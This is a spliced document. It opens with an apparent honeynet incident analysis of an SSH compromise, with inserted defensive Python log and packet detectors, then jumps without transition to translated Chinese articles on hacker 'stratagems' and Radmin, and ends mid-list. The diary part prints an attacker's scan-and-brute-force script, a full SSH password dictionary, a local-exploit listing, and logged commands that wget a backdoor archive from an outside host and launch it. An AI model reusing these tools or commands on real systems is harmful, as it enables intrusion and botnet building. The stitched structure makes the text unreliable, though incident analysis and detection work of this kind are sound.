echo "----------------------------------------------------"
echo "# incep scanarea ..."                # "starting the scan ..."
./pscan2 $1 22                             # scan the range for TCP/22; results land in $1.pscan.22
sleep 10
cat $1.pscan.22 |sort |uniq >uniq.txt      # de-duplicate the list of hosts with SSH open
oopsnr2=`grep -c . uniq.txt`               # count non-empty lines = number of servers found
echo "# Am gasit $oopsnr2 de servere"      # "Found $oopsnr2 servers"
echo "----------------------------------------"
echo "# Incepem..."                        # "Let's begin..."
./sshf 50                                  # run the ssh dictionary-attack tool (meaning of the argument is not given in the report)
rm -rf $1.pscan.22 uniq.txt                # clean up the scan output
echo "Asta a fost tot"                     # "That was all"
If we take a closer look at pscan2, here is its usage syntax to scan for servers having the SSHD service running on TCP port 22.
Usage: %s [c-block]
Also, looking at ./sshf, which the script launches, it contains a dictionary of user IDs and passwords used in the ssh dictionary attack. openssl 0.9.7d libraries are used in the attack.
Here is the list of user IDs and passwords used:
nobody
patrick
qwerty
compas
sniper
12345678
123456789
1234567890
rolo66
rolo
iceuser
horde
cyrus
wwwrun
matt
teste
test
test2
test23
test123
www-data
mysql
operator
apache
switch
c43vr013T
1gcec19v8yz153072
jane
pamela
shadow
eegch11
r00t
abcd1234
ctxmonitor
cosmin
%username%
%null%
00000000
111111
1234qwer
1p2o3i
@#$%^&
apollo
passwor
passion
passwd
redhat
people
qwaszx
qwert
tester
zxcvbnm
zxcvb
zorro
e4K1mo0$
f4r6k2g7t9q3
w5n8o7t9i6x3
o6v9z3d8y7m9
k1u7r1t2r1t8
w5u6s9v7k5t4
linux
stones
yellow
cooling
b604092
bash
cmcnew
kH9dzv
toor
actros
cip52
pharma
cip51
spyder
bk123qwe
Lex1c0n3
1q2w3e
webmaster
user01
user1
user02
oracle
sybase
account
backup
adam
alan
frank
george
henry
john
love
hate
iloveyou
present
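The assh/sshf pair above is an SSH dictionary attack. Seen from the defender's side, this added example (not part of the honeynet diary) is the detection logic run over constructed OpenSSH auth-log lines: it flags a source that fails many logins across several usernames and, worse, one whose guess is then accepted. The thresholds and the sample log are assumptions.

```python
import re
from collections import defaultdict

# Constructed OpenSSH auth-log excerpt (RFC 5737 addresses); not taken from the honeypot.
SAMPLE_LOG = """\
Sep  6 18:21:01 honeypot sshd[2201]: Failed password for invalid user test from 192.0.2.10 port 38381 ssh2
Sep  6 18:21:03 honeypot sshd[2203]: Failed password for invalid user apache from 192.0.2.10 port 38382 ssh2
Sep  6 18:21:05 honeypot sshd[2205]: Failed password for root from 192.0.2.10 port 38383 ssh2
Sep  6 18:21:07 honeypot sshd[2207]: Failed password for invalid user mysql from 192.0.2.10 port 38384 ssh2
Sep  6 18:21:09 honeypot sshd[2209]: Failed password for invalid user www-data from 192.0.2.10 port 38385 ssh2
Sep  6 18:21:12 honeypot sshd[2211]: Accepted password for test from 192.0.2.10 port 38386 ssh2
Sep  6 18:30:00 honeypot sshd[2301]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Sep  6 18:30:20 honeypot sshd[2302]: Accepted password for alice from 198.51.100.7 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d+\.\d+\.\d+\.\d+) port \d+ ssh2$"
)


def parse_line(line):
    """Return {ts, result, user, ip} for a password-auth line, or None for anything else."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def detect_dictionary_attacks(log_text, min_failures=5, min_users=3):
    """Per source IP, count failures and distinct usernames in log order. A success that
    arrives after the failure threshold is already met is reported as a probable compromise."""
    state = defaultdict(lambda: {"failures": 0, "users": set(), "compromised": False})
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if ev is None:
            continue
        s = state[ev["ip"]]
        if ev["result"] == "Failed":
            s["failures"] += 1
            s["users"].add(ev["user"])
        elif s["failures"] >= min_failures:
            s["compromised"] = True
    return {
        ip: {"failures": s["failures"], "users": sorted(s["users"]), "compromised": s["compromised"]}
        for ip, s in state.items()
        if s["failures"] >= min_failures and len(s["users"]) >= min_users
    }
```

The usernames the sample source cycles through (test, apache, root, mysql, www-data) are exactly the service accounts that appear in the attacker's dictionary above.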
While the tools in local.tar.gz were never used, it contains the following README listing:
all around local exploits..
4 linux , sunos , freebsd..
all public , no one private..
-
have phun
Zorg of texter
rohackingggggggggggggggg..:=)
Directory listing:
-rwxr-xr-x 1 5775 users 463529 Feb 23 2004 brk
-rwxr-xr-x 1 5775 users 452101 May 4 2004 brk2
-rwxr-xr-x 1 5775 users 4817 Jun 15 07:03 bsdsh
-rwxr-xr-x 1 5775 users 16154 Jul 31 07:06 dexter
-rwxr-xr-x 1 5775 users 17472 Jul 31 07:08 doptikbd
-rwxr-xr-x 1 5775 users 6 Jul 31 07:13 f3
-rwxr-xr-x 1 5775 users 14860 Jul 31 06:41 kmod
-rwxr-xr-x 1 5775 users 19517 Jul 31 06:41 kmod2
-rwxr-xr-x 1 5775 users 445808 Aug 11 22:23 loginx
-rwxr-xr-x 1 5775 users 3078 Jun 20 man-rh7.sh
-rwxr-xr-x 1 5775 users 1327 Jun 20 2001 modutils.sh
-rwxr-xr-x 1 5775 users 19414 Jul 31 06:29 mremap2
-rwxr-xr-x 1 5775 users 425887 Jul 31 06:30 mremap_pte
-rwxr-xr-x 1 5775 users 1729 May 5 2001 prlnx.sh
-rwxr-xr-x 1 5775 users 19910 Mar 20 pt
-rwxr-xr-x 1 5775 users 19242 Jul 31 07:08 r0nin
-rw-r--r-- 1 5775 users 147 Aug 11 22:23 README
-rwxr-xr-x 1 5775 users 17318 Jul 31 07:08 rsybd
-rwxr-xr-x 1 5775 users 2311 May 5 2001 smlnx.sh
-rwxr-xr-x 1 5775 users 1759 Jul 31 06:52 stringetz
-rwxr-xr-x 1 5775 users 468689 Jul 31 06:30 w00t
-rwxr-xr-x 1 5775 users 4625 May 5 2001 xperl.sh
Looking at the psybnc tool used
In psybnc.conf, residing in the xsf directory, the system port is set to TCP port 65500.
PSYBNC.SYSTEM.PORT1=65500
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
Let us check out the FTP session that was initiated.
Sebek was not yet installed on this honeypot, so what went on behind the ftp command is derived from the honeywall pcap trace. After all, FTP is clear-text. Here are some snapshots of the hexadecimal and ASCII traces.
Intruder logged in using the userid abc (masked)
07:30:58.280013 X.X.X.X.38381 >D.D.D.D.ftp: P 1:16(15) ack 24 win 5840 (DF) [tos 0x10]
0x0000 4510 0037 da54 4000 4006 b4b9 XXXX XXXX E..7.T@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a912 fdb1 c69c DDDD....b.......
0x0020 5018 16d0 8154 0000 5553 4552 20aa bbcc P....T.. USER.abc
Intruder logged in using the password xyz (masked)
07:31:01.572491 X.X.X.X.38381 >D.D.D.D.ftp: P 16:30(14) ack 61 win 5840 (DF) [tos 0x10]
0x0000 4510 0036 da56 4000 4006 b4b8 XXXX XXXX E..6.V@.@...XXXX
0x0010 DDDD DDDD 95ed 0015 62aa a921 fdb1 c6c1 DDDD....b..!....
0x0020 5018 16d0 67bf 0000 5041 5353 20xx yyzz P...g...PASS.xyz
Intruder downloaded psybnc.jpg
07:31:36.760693 D.D.D.D.ftp >X.X.X.X.38381: P 310:381(71) ack 90 win 5840 (DF)
0x0000 4500 006f a55a 4000 3106 f88b DDDD DDDD E..o.Z@.1...DDDD
0x0010 XXXX XXXX 0015 95ed fdb1 c7ba 62aa a96b XXXX........b..k
0x0020 5018 16d0 f43b 0000 3135 3020 4f70 656e P....;..150.Open
0x0030 696e 6720 4249 4e41 5259 206d 6f64 6520 ing.BINARY.mode.
0x0040 6461 7461 2063 6f6e 6e65 6374 696f 6e20 data.connection.
0x0050 666f 7220 7073 7962 6e63 2e6a 7067 2028 for.psybnc.jpg.(
0x0060 3539 3637 3330 2062 7974 6573 290d 0a 596730.bytes)..
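The dumps above recover the FTP login only because the protocol is clear-text. As an added example (not from the diary), here is a small parser for tcpdump-style hex lines like those above: it rebuilds the packet, strips the IPv4 and TCP headers, and raises an alert when a USER or PASS command is seen heading for port 21, redacting the password in the alert. The dump lines and addresses are constructed; checksums are not validated.

```python
import re

# Constructed tcpdump-style dump of two FTP client packets (RFC 5737 addresses); not the page's masked trace.
SAMPLE_DUMP = """\
07:30:58.280013 192.0.2.10.38381 > 198.51.100.7.ftp: P 1:17(16) ack 24 win 5840 (DF) [tos 0x10]
0x0000 4510 0038 da54 4000 4006 b4b9 c000 020a E..8.T@.@.......
0x0010 c633 6407 95ed 0015 62aa a912 fdb1 c69c .3d.....b.......
0x0020 5018 16d0 8154 0000 5553 4552 2061 6e6f P....T..USER.ano
0x0030 6e79 6d6f 7573 0d0a nymous..
07:31:01.572491 192.0.2.10.38381 > 198.51.100.7.ftp: P 17:30(13) ack 61 win 5840 (DF) [tos 0x10]
0x0000 4510 0035 da56 4000 4006 b4b8 c000 020a E..5.V@.@.......
0x0010 c633 6407 95ed 0015 62aa a922 fdb1 c69c .3d.....b.."....
0x0020 5018 16d0 67bf 0000 5041 5353 2073 6563 P...g...PASS.sec
0x0030 7265 740d 0a ret..
"""

HEX_GROUP = re.compile(r"^(?:[0-9A-Fa-f]{4}|[0-9A-Fa-f]{2})$")
TIMESTAMP = re.compile(r"^\d\d:\d\d:\d\d\.\d+ ")


def split_packets(dump_text):
    """Group dump lines into packets; each packet starts with a timestamped summary line."""
    packets, current = [], []
    for line in dump_text.splitlines():
        if TIMESTAMP.match(line):
            if current:
                packets.append(current)
            current = [line]
        elif current:
            current.append(line)
    if current:
        packets.append(current)
    return packets


def packet_bytes(lines):
    """Rebuild raw bytes from "0xNNNN hhhh hhhh ... ascii" lines, stopping at the IPv4 total length."""
    data, total = bytearray(), None
    for line in lines:
        if total is not None and len(data) >= total:
            break
        tokens = line.split()
        if not tokens or not tokens[0].lower().startswith("0x"):
            continue
        for tok in tokens[1:9]:  # at most eight hex groups per line; the ASCII column follows them
            if not HEX_GROUP.match(tok):
                break
            data.extend(bytes.fromhex(tok))
            if total is None and len(data) >= 4:
                total = int.from_bytes(data[2:4], "big")  # IPv4 total length field
            if total is not None and len(data) >= total:
                break
    return bytes(data[:total] if total else data)


def tcp_fields(pkt):
    """Return (dst_port, payload) for an IPv4/TCP packet, or None for anything else."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4 or pkt[9] != 6:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    dport = int.from_bytes(pkt[ihl + 2:ihl + 4], "big")
    doff = (pkt[ihl + 12] >> 4) * 4
    return dport, pkt[ihl + doff:]


def ftp_login_alerts(dump_text):
    """Alert on cleartext FTP credentials bound for port 21; the password itself is never echoed."""
    alerts = []
    for lines in split_packets(dump_text):
        fields = tcp_fields(packet_bytes(lines))
        if fields is None or fields[0] != 21:
            continue
        text = fields[1].decode("ascii", errors="replace").strip()
        cmd, _, arg = text.partition(" ")
        if cmd.upper() == "USER":
            alerts.append(f"cleartext FTP login attempt: user={arg}")
        elif cmd.upper() == "PASS":
            alerts.append(f"cleartext FTP password observed ({len(arg)} chars, redacted)")
    return alerts
```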
Using the same ftp userid and password, all the exploits in the repository can be retrieved for research.
# ftp D.D.D.D
Connected to D.D.D.D (D.D.D.D).
220 D.D Members FTP
Name (D.D.D.D:root): abc
331 Password required for abc.
Password:
230 User abc logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>ls
227 Entering Passive Mode (D,D,D,D,102,150).
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 free web 37558 Oct 15 14:00 big.jpg
-rw-r--r-- 1 free web 377371 Aug 29 19:32 bk.tar.gz
-rw-r--r-- 1 free web 13342 Oct 18 17:58 brutessh2.tgz
-rw-r--r-- 1 free web 787019 Oct 13 17:24 dcstealth.zip
-rw-r--r-- 1 free web 720324 Sep 26 07:59 emech-madalin.tar.gz
-rw-r--r-- 1 free web 720348 Sep 21 18:56 emech.tar.gz
-rw-r--r-- 1 free web 720336 Sep 26 16:58 emechm.tar.gz
-rw-r--r-- 1 free web 173960 Sep 14 14:15 flood.tgz
-rw-r--r-- 1 free web 391294 Sep 24 11:19 massSSH.tgz
-rw-r--r-- 1 free web 717959 Sep 2 20:16 mech.tar.gz
-rw-r--r-- 1 free web 9052 Sep 16 18:09 miro.tgz
-rw-r--r-- 1 free web 80679 Oct 2 12:19 muie.mp3
-rw-r--r-- 1 free web 596730 Aug 30 05:51 psybnc.jpg
-rw-r--r-- 1 free web 895785 Sep 2 07:26 scan.tar
-rw-r--r-- 1 free web 26510 Sep 1 12:09 x.tar.gz
-rw-r--r-- 1 free web 10141 Sep 2 07:26 za.tgz
After logging out, the intruder immediately logged in again at 2333 hrs from Z.Z.Z.Z.
The reason was that his psybnc IRC system-control backdoor on TCP port 65500 was not working, so he typed the following commands to work around this handicap. He was probably too lazy to probe which ports were open to the Internet at the border firewall.
Command sequence and explanation:
cd /tmp
    Change directory to /tmp.
sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT
    Attempt to update iptables to allow access to port 65500; it failed because he missed out the / at the front.
/sbin/iptables -I INPUT -p tcp --dport 65500 -j ACCEPT
    Second attempt to update iptables to allow access to port 65500; it failed simply because he is not root with superuser privileges.
wget E.E.E.E/emech.tar.gz
    Next, he downloads the emech IRC backdoor archive from E.E.E.E. He probably chose another IRC backdoor client because he thought the problem lay with his earlier psybnc IRC backdoor toolkit. Instead of attempting any of the local privilege escalation exploits provided by the local.tar.gz he downloaded in his earlier session, he downloaded emech.tar.gz, which is another IRC backdoor toolkit.
tar zxvf emech.tar.gz
    Untarring the emech.tar.gz IRC backdoor archive.
rm -rf mech.tar.gz
    He failed to remove the archive because of a typo, i.e. he missed the "e" at the front.
cd mech
    Change directory to the emech directory extracted from emech.tar.gz.
./mech
    Launch the mech backdoor.
exit
    This time a single exit was successful.
This logon session took 11 mins.
Checking out emech.
The IRC configuration file of emech i.e. mech.session has this:
hasonotice
nick Free`Bnc
login woot
ircname Who am I ?
modes ix
cmdchar
userfile emech.users3
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick PutMeUp
login hack
ircname Powerd By Romanian Hackers
modes ix
cmdchar
userfile emech.users2
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]dea
channel #[snipped]eam
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick Ascultat
login root
ircname 0,1Protected by National #[snipped]rum Team !!!
modes ix
cmdchar
userfile emech.users1
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
nick FavoritX
login cool
ircname Missing You Baby...
modes ix
cmdchar
userfile emech.users
set BANMODES 2
set OPMODES 2
set CTIMEOUT 90
set CDELAY 30
tog SPY 1
channel #[snipped]rum
channel #[snipped]gia
set MDL 3
set MBL 3
set MKL 3
set FL 3
set MAL 2
tog RK 1
tog PROT 1
tog KS 1
set AVOICE 1
[Post-sorted for ease of identification]
[Servers using TCP/6667]
server F.F.F.2 6667
server G.G.G.133 6667
server H.H.H.H 6667
server I.I.I.150 6667
server J.J.J.246 6667
server K.K.K.100 6667
server L.L.L.33 6667
[Servers using TCP/7000]
server M.M.M.248 7000
[Servers using TCP/8888]
server N.N.N.2 8888
From the configuration file we can identify all the IRC servers used for the botnet as well as the IRC backdoor accounts that have joined the large botnet. Use of the above IRC servers is further confirmed by the pcap traces.
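Pulling the servers and channels out of mech.session by hand works for one bot; as an added example (not the team's own tooling), here is a parser for that format that returns the indicators a defender would push to egress filtering and the IDS: C2 hosts grouped by port, channel names and the ident logins. The session excerpt is constructed with documentation addresses.

```python
from collections import defaultdict

# Constructed mech.session excerpt in the layout shown above (RFC 5737 addresses, not the page's masked ones).
SAMPLE_SESSION = """\
hasonotice
nick Free`Bnc
login woot
ircname Who am I ?
modes ix
cmdchar
userfile emech.users3
tog SPY 1
channel #alpha
channel #beta
nick PutMeUp
login hack
ircname Powerd By Romanian Hackers
channel #alpha
channel #gamma
server 192.0.2.2 6667
server 198.51.100.133 6667
server 203.0.113.248 7000
"""


def parse_mech_session(text):
    """Each `nick` line opens a bot; `login`, `ircname` and `channel` attach to it; `server` lines are global."""
    bots, servers, current = [], [], None
    for raw in text.splitlines():
        parts = raw.strip().split(None, 1)
        if not parts:
            continue
        key, rest = parts[0].lower(), (parts[1] if len(parts) > 1 else "")
        if key == "nick":
            current = {"nick": rest, "login": None, "ircname": None, "channels": []}
            bots.append(current)
        elif key == "login" and current is not None:
            current["login"] = rest
        elif key == "ircname" and current is not None:
            current["ircname"] = rest
        elif key == "channel" and current is not None:
            current["channels"].append(rest.split()[0])  # ignore any channel key that follows the name
        elif key == "server":
            fields = rest.split()
            if len(fields) >= 2 and fields[1].isdigit():
                servers.append((fields[0], int(fields[1])))
    return {"bots": bots, "servers": servers}


def indicators(parsed):
    """What a defender feeds to egress filtering and IDS: C2 hosts by port, channel names, ident logins."""
    by_port = defaultdict(set)
    for host, port in parsed["servers"]:
        by_port[port].add(host)
    return {
        "by_port": {port: sorted(hosts) for port, hosts in sorted(by_port.items())},
        "channels": sorted({c for bot in parsed["bots"] for c in bot["channels"]}),
        "idents": sorted({bot["login"] for bot in parsed["bots"] if bot["login"]}),
    }
```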
These are some of the IRC backdoor accounts that have joined the large botnet. The IP addresses are those of compromised IRC botnet zombies.
[Details have been snipped due to sensitivity reasons]
Multiple different entries of: ~cool@[snipped]
~hack@[snipped]
~root@[snipped]
~woot@[snipped]
[Other entries snipped]
What caught my attention most is ~woot@Z.Z.Z.Z (this is the system that compromised our honeypot!)
The IRC channels used and verified in the pcap traces are:
channel #[snipped]rum
channel #[snipped]eam
channel #[snipped]dea
channel #[snipped]gia
Here are a couple of the pcap traces:
07:57:05.188294 F.F.F.2.ircd >X.X.X.X.38408: P 3217:4347(1130) ack 179 win 2896
[Details snipped]
07:57:05.944658 F.F.F.2.ircd >X.X.X.X.38408: . 5435:6883(1448) ack 179 win 2896
[Details snipped]
[Details snipped]
Beyond the compromise, there is observably a fair bit of FTP scanning.
Taking just one of the hosts that scanned us, G.G.G.146, it looks like a harmless FTP probe checking whether the service is available. Since the FTP service is not enabled on honeypot-rhl, perhaps our next activity should be to enable it in order to capture and observe a successful compromise of it.
FTP scanning:
6 O.O.O.146
4 P.P.P.104
3 Q.Q.Q.202
2 R.R.R.57
2 S.S.S.130
Conclusion
This is our first honeypot compromise and it has already proved most interesting. Further details (without compromising sensitivity) may be offered by the other duty analysts in the next few days. In the near future the team will work on various configurations to track and understand blackhats.
References:
[1] www.security.org.sg/gtec/honeynet/viewdiary.php?diary=20040921
Count Intrusion attempt
107 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 15) Scanner(fixed: 0 sliding: 0)
106 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 30) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker (fixed: 15 sliding: 29) Scanner(fixed: 0 sliding: 0)
80 Portscan detected from X.X.X.X Talker(fixed: 15 sliding: 14) Scanner(fixed: 0 sliding: 0)
79 Portscan detected from X.X.X.X Talker(fixed: 1 sliding: 30) Scanner(fixed: 0 sliding: 0)
33 ICMP Destination Unreachable Port Unreachable
31 BACKDOOR typot trojan traffic
24 CHAT IRC message
24 BAD-TRAFFIC loopback traffic
22 SHELLCODE x86 NOOP
12 SIG^2 GTEC-honeynet - Possible NACHI worm ICMP ECHO traffic
11 MS-SQL Worm propagation attempt
10 ICMP Echo Reply
7 ICMP PING
3 ICMP PING NMAP
3 CHAT IRC nick change
2 (spp_stream4) possible EVASIVE RST detection
1 WEB-MISC bad HTTP/1.1 request, Potentially worm attack
1 WEB-MISC WebDAV search access
1 WEB-IIS view source via translate header
1 SHELLCODE x86 setgid 0
1 ATTACK-RESPONSES 403 Forbidden
1 (http_inspect) OVERSIZE REQUEST-URI DIRECTORY
1 (http_inspect) BARE BYTE UNICODE ENCODING
Country sources of attacks
9 China (CN)
6 United States of America (US)
3 Singapore (SG)
2 South Korea (KR)
2 Japan (JP)
1 Turkey (TR)
1 Trinidad and Tobago (TT)
1 Netherlands (NL)
1 Latvia (LV)
1 Italy (IT)
1 Germany (DE)
1 Chile (CL)
1 Brazil (BR)
1 Austria (AT)
1 Australia (AU)
Article 2: The Network Art of War! Attack and Defence Also Have Thirty-Six Stratagems
We already know about Trojans, scanners and sniffers, but hacker tools go far beyond these: there are network bombs that harm others without benefiting the attacker, tools aimed specifically at QQ (such as QQ Password Terminator, QicqSpy for remote attacks, the QQ bomb OICQShield and so on), denial-of-service attacks (DDoS and the like), IP spoofing, web spoofing, DNS spoofing and more, even more detestable than the ten great villains in Gu Long's novels. Let us look back at how hackers attack, and at how we should pick up the weapons at hand and fight back.
1. Muddying the water to catch fish VS Taking the firewood from under the cauldron
Hackers may start a program on your machine that forges the system logon screen, swapping a cat for the crown prince. Unaware, you will most likely walk into this "den of thieves"; once you enter your username and password into the fake screen, the fake logon program quietly sends what you typed to the hacker's machine in the background, then shows an error saying "username and password do not match, please log in again". Only then does the real logon screen appear.
Scary, isn't it? The countermeasure is to take the firewood from under the cauldron: force the logon window to be brought up only by pressing Ctrl+Alt+Del. Go to Start Menu → Administrative Tools → Local Security Policy to open the Local Security Settings dialog, then Local Policies → Security Options, double-click "Disable CTRL+ALT+DEL requirement for logon" in the right-hand pane, and of course set it to disabled. This stops the hacker from muddying the water.
Another method is to enable a firewall, one of whose important roles is to stop unauthorised users logging on to your machine. For example, port filtering can forbid external hosts from Telnetting to internal hosts.
There is a similar attack. Say you are roaming the Internet with IE or another browser, reading newsgroups, checking product prices, subscribing to newspapers, doing e-commerce, enjoying all the convenience the network brings. You probably never imagine that the page you are visiting has already been tampered with by a hacker and the information on it is false! For example, the hacker rewrites the URL of the page the user wants to browse so that it points at the hacker's own server; when the user browses the target page, the request actually goes to the hacker's server, and the deception succeeds. Prevention means avoiding untrustworthy sites as far as possible; if you must visit one, view the page source to see whether it is fake, and disable script support and ActiveX controls in IE.
2. Sacrifice the plum tree for the peach tree VS Following the vine to find the melon
Hackers may attack you through a proxy server; a cunning hacker will also use the unattended transfer service of an 800 number to connect to an ISP and then go online with someone else's stolen account. Before reaching you he may already have used several stepping stones. Even if you go to enormous lengths to trace the attacker's IP address, its owner may be a victim just like you.
It may not always help, but you are advised to do this, since something is better than nothing: enable the event auditing feature in Windows. Be aware that by default no audit events are recorded at all! The method, again, is to open Local Security Settings, go to Local Policies → Audit Policy, double-click "Audit logon events" in the right-hand pane and tick both "Success" and "Failure", then tick everything else such as "Audit object access" and "Audit account logon events". Don't worry about wasting disk space: if a hacker takes the machine, the disk is his anyway, which is a far greater waste.
3. Steal the beams and change the pillars VS Shut the door to catch the thief
As mentioned before, hackers can obtain your sensitive information with a sniffer. This method has certain limitations, for example the sniffer must be planted on your network segment, but its harm is enormous: hackers can easily obtain your accounts and passwords. Many protocols in use today employ no encryption or authentication at all; in transport protocols such as Telnet, FTP, HTTP and SMTP, account and password information travels in clear text, which is very convenient for an attacker, who can easily collect your confidential data with a packet-capture tool such as Iris. There is an even more cunning man-in-the-middle attack: after you complete the "three-way handshake" with the server and establish a connection, it plays the "third party" during the communication, impersonating the server to deceive you and impersonating you to send malicious requests to the server, with consequences too dire to contemplate. In addition, attackers sometimes use software and hardware tools to monitor the host constantly, waiting to record user logon information and thus obtain passwords, or use SUID programs that contain buffer-overflow bugs to gain superuser privileges.
Against this method, first keep the fence tight: the machines on the same segment should be ones that can trust each other. At the same time, use anti-sniffer tools such as AntiSniffer to monitor the network in real time.
4. The beauty trap VS Luring the enemy in deep
As said before, Trojan programs are small and potent, so hackers are fond of them; although veteran experts often disdain them, statistics show that sixty percent of hacker attacks use Trojans.
A Trojan can slip directly into your computer and do damage. It often disguises itself as a game or an MP3 to lure you into opening it; once you double-click an e-mail attachment carrying a Trojan or a seemingly legitimate program downloaded from the Internet, it stays in the computer and can make itself start with Windows. When you connect to the Internet, the program notifies the hacker (by e-mail or instant message) of your IP address and the port that can be attacked. On receiving this, the hacker uses the Trojan's client program, which works together with the server program lurking on your machine, to change your computer's settings at will, copy files, peek at the entire contents of your hard disk and so on, thereby taking control of your computer.
To defeat the Trojan's beauty trap, first do not casually open e-mails and files of unknown origin, and do not run programs given to you by people you do not know well; hacker programs such as "Trojan horses" need to trick you into running them. Avoid downloading unknown software and games from the Internet as far as possible. Even software downloaded from well-known sites should be scanned promptly, along with the system, with the latest virus and Trojan removal software. Once a Trojan is found, do not rush to march it off to the execution ground; extract a confession first: use the netstat command to see who is connecting to you, then analyse the Trojan and see whose e-mail address is written in its notification option, and you can punish him in return.
5. Kill with a borrowed knife: the DDoS attack
A DDoS attack, a distributed denial-of-service attack, attacks one target host simultaneously from many distributed hosts so that it is completely paralysed; many famous sites such as Yahoo, Buy.com and Amazon have received this "hundred birds paying homage to the phoenix" treatment. A distributed denial-of-service attack uses a four-layer client/server architecture: the target host is at the top and the master attacker at the bottom, connected to a second layer of attack servers (relatively few, from several to a few dozen); the attack servers distribute the master's commands to a third layer of attack agents (very numerous), which carry out the attack on the target host. The attack servers mainly isolate the attacker from direct contact with the network, reducing the chance of discovery, and coordinate the assault. The attack agents run simple programs that send avalanches of data at the target host without requiring an ACK (reply).
The master attacker is usually an ordinary host, possibly even a laptop, so its location may not be fixed; it issues the instruction to attack a specific target to the attack servers. On receiving the command, the attack agents send huge numbers of packets to harass the target host, and these packets are also disguised so that their source addresses cannot be identified. Very soon the target host exhausts its resources and collapses.
There is currently no directly effective countermeasure for this move; one can only take precautions in advance.
First, make sure the server has the latest service pack and all the latest security patches installed. Using the English version of the operating system is recommended, because it has far fewer bugs than the Chinese version and service packs, patches and vulnerability information are released much faster; most attack cases stem from unpatched vulnerabilities.
Second, the system administrator must check all the peripheral hosts around key systems, not just the key systems themselves; that is, make sure ordinary peripheral hosts cannot be taken over by hackers. Once a hacker directly controls a peripheral host, the situation is dire. Make sure the administrator knows what operating system each peripheral host runs, who uses them and who can access them; know the answers in advance rather than looking them up only after the hacker has struck, when it is already too late.
Some unused services, such as Telnet, FTP and SMTP, show passwords and accounts in clear text. They should be retired decisively and their ports sealed so they cannot come back to life. As discussed before, a hacker may gain superuser privileges through an IPC$ attack and access other systems, whether or not they are protected by a firewall.
If the host is Unix, make sure all daemon services have TCP wrappers and restrict access to the host.
It is best not to let the internal network reach the Internet through a "modem". Otherwise hackers can easily discover unprotected hosts over the phone line and attack them at once.
Restrict network file sharing outside the firewall. Otherwise hackers have the opportunity to intercept system files and replace them with Trojans, and the file transfer function will be paralysed.
Fight fire with fire: run a scanner program against the firewall. Most attacks succeed because the firewall is misconfigured, which gives DDoS attacks a high success rate, so use a scanner to see exactly which unknown ports are open and which vulnerabilities exist; you can check with the Fluxay (流光) scanner mentioned earlier.
Check the logs of all network devices and host/server systems promptly. As soon as a log looks abnormal or shows signs of being modified or deleted, you can suspect that the host has been visited by a hacker.
Although the above methods are not directly effective, a tight fence prevents the intrusion of all kinds of hacker tools to the greatest extent, naturally including distributed denial-of-service (DDoS) attacks.
Article 3: A Comprehensive Look at Radmin in Network Attack and Defence
Radmin is a world-renowned remote control program; its full control, file transfer and Telnet functions are very convenient. Before Radmin 3.0, antivirus software did not flag it; later, because hackers and viruses used r_server extensively as a vehicle, r_server was treated as a security threat, and today some antivirus products centred on proactive defence, as well as firewalls, actively blacklist r_server. Nevertheless Radmin remains popular with network security people. Domestic security groups have published many articles and tools on Radmin, for example the Radmin hash connector: once the Radmin password hash is obtained, the tool connects directly without knowing the password.
This article introduces Radmin from the viewpoint of network attack and defence; through it readers can learn a great deal about attacking and protecting Radmin.
I. Introduction to Radmin
Radmin is short for Remote Administrator; its vendor (www.radmin.com) describes it as PC Remote Control Software and Remote Access Software. It is an award-winning remote control program, currently at version 3.4, which combines remote control, outsourced service components and network monitoring in one system, offering the fastest, most robust and most secure toolkit to date.
(1) Main features
1. Highest working speed
Radmin is currently the fastest remote control software. Its Direct Screen Transfer technology uses a video-hook kernel-mode driver to raise the capture rate to hundreds of screen updates per second. Its special low-bandwidth optimisation lets you work comfortably over dial-up modem and GPRS connections.
2. Highest security level
Radmin works in encrypted mode: all data for every connection to the remote computer, screen images, mouse movements and keyboard signals are encrypted with 256-bit AES using randomly generated keys. Either Windows Security or Radmin Security can be used. Windows security supports different permissions for specific users, or for user groups of the primary domain, trusted domains and Active Directory, with automatic use of the logged-on user's credentials and Kerberos authentication. Radmin security supports different permissions for users added to the Radmin Server access list. Radmin user authentication uses a new Diffie-Hellman-based key exchange with a 2048-bit key.
The IP filter allows access to Radmin Server only from specific IP addresses and networks. DNS names and user names are added to the log file. Smart protection against password guessing automatically delays after five wrong password attempts.
3. Hardware support for remote control of new Intel AMT products!
Radmin 3.4 supports Intel AMT (Active Management Technology), which allows control of a remote computer even when it is switched off or the operating system cannot boot. With Radmin Viewer you can power on, restart and shut down the remote computer. It also lets users view and modify the remote computer's BIOS settings and boot it from a local CD or disk image file.
4. Full compatibility with the new features of Windows 7!
